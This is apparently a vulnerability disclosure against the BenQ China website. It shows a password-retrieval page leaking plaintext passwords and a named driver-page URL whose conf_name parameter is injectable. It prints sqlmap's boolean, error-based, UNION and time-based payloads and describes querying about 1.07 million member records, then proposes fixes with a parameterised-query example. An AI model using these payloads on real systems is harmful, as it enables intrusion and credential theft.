Website vulnerabilities of an electronic communications company, 1.07 million member passwords in plaintext, and solutions
Website address: www.benq.com.cn. Two vulnerabilities:
1. The password-retrieval function leaks passwords.
Go to the main site, click "Quick Logon" at the top, then click "Remember password", enter the account number and the verification code. The next step lands on an error page that prints out the SQL statement, and with it the password in plaintext.
At this point I felt that the security awareness of this site was not high and that there might be other problems. Clicking around, I found the following SQL injection.
2. SQL injection on one page. Through sqlmap's SQL shell the following important information can be viewed.
Page URL: http://www.benq.com.cn/support/drivers?conf_name=monitor&prod_model=BL2201M, where the conf_name parameter is injectable.
A) The administrator account password and other information can be viewed.
B) The records of the 1.07 million registered members can be queried, including the plaintext of each password.
Problem 1: password-retrieval vulnerability
1. Open the password-retrieval page and enter the relevant information.
2. After clicking next, the error page appears. Both the MD5 value and the plaintext of the password are displayed.
Problem 2: SQL injection
Step 1: Display the database name. It can in fact already be seen on the error page above: benq.
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: conf_name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
available databases [2]:
[*] benq
[*] information_schema
Step 2: List the tables (sqlmap reports 89 tables in the benq database). Two important ones, auth__user and member__users, should be the administrator table and the member table.
Step 3: Skip the contents of the administrator table. The password-retrieval vulnerability had already shown a member's password in plaintext, which suggested that the database stores passwords in plaintext. This roughly confirmed my conjecture: looking at the data of member__users in the table below, the last column is the plaintext of the password.
Finally, let's look at the total number of members: more than 1.07 million.
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
select count(*) from member__users;: '1075524'
The data viewed during the test was deleted after the report was submitted to WooYun (乌云) ~
Solution:
1. Fix the password-retrieval function and redirect the error page, so that neither the SQL statement nor the password is ever rendered to the user.
2. Prevent SQL injection. Filtering in front of the application, for example with nginx, can be used; the modification workload is small and the effect is good.
To the manufacturer BenQ: please send a gift, preferably a BenQ product. I am your loyal customer.
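The report recommends filtering in front of the application; the example below, added here and not part of the original report or of the site's code, shows the application-level fix instead, a parameterised query beside the vulnerable string-concatenated one, and uses the boolean-based blind payload from the sqlmap output above as a regression check. The table, column names and rows are constructed assumptions, and SQLite stands in for the site's MySQL 5.0.

```python
import sqlite3

# Constructed stand-in for the driver lookup behind
# /support/drivers?conf_name=...&prod_model=... ; the real schema is not on
# the page, so the table and column names here are assumptions, and SQLite
# stands in for the site's MySQL 5.0.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE prod_conf (conf_name TEXT, prod_model TEXT, driver TEXT)")
    con.executemany("INSERT INTO prod_conf VALUES (?, ?, ?)", [
        ("monitor", "BL2201M", "bl2201m_win7.zip"),      # constructed row
        ("projector", "MX505", "mx505_firmware.bin"),    # constructed row
    ])
    return con

def lookup_vulnerable(con, conf_name, prod_model):
    # Builds the statement by concatenation, as the leaking page evidently did:
    # whatever arrives in conf_name becomes part of the SQL text.
    sql = ("SELECT driver FROM prod_conf WHERE conf_name = '" + conf_name
           + "' AND prod_model = '" + prod_model + "'")
    return [row[0] for row in con.execute(sql)]

def lookup_safe(con, conf_name, prod_model):
    # Parameterised query: the values travel separately from the SQL text,
    # so a quote inside conf_name can only be compared, never executed.
    sql = "SELECT driver FROM prod_conf WHERE conf_name = ? AND prod_model = ?"
    return [row[0] for row in con.execute(sql, (conf_name, prod_model))]

# The boolean-based blind payload from the sqlmap output above, plus a
# variant whose injected condition is false.
TRUE_PAYLOAD = "monitor' AND 9677=9677 AND 'JRvg'='JRvg"
FALSE_PAYLOAD = "monitor' AND 9677=9678 AND 'JRvg'='JRvg"

def differs_under_payloads(lookup):
    # Regression check for the fix: an injectable lookup answers the true and
    # false payloads differently (the oracle behind sqlmap's boolean-based
    # blind test); a fixed lookup treats both as literal, non-matching names.
    con = make_db()
    return lookup(con, TRUE_PAYLOAD, "BL2201M") != lookup(con, FALSE_PAYLOAD, "BL2201M")

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, true payload :", lookup_vulnerable(con, TRUE_PAYLOAD, "BL2201M"))
    print("vulnerable, false payload:", lookup_vulnerable(con, FALSE_PAYLOAD, "BL2201M"))
    print("safe, true payload       :", lookup_safe(con, TRUE_PAYLOAD, "BL2201M"))
    print("injectable? vulnerable:", differs_under_payloads(lookup_vulnerable),
          "safe:", differs_under_payloads(lookup_safe))
```

Front-end filtering of the kind the report suggests can still be bypassed by encodings the filter does not recognise, whereas the parameterised form removes the injection regardless of what reaches the query.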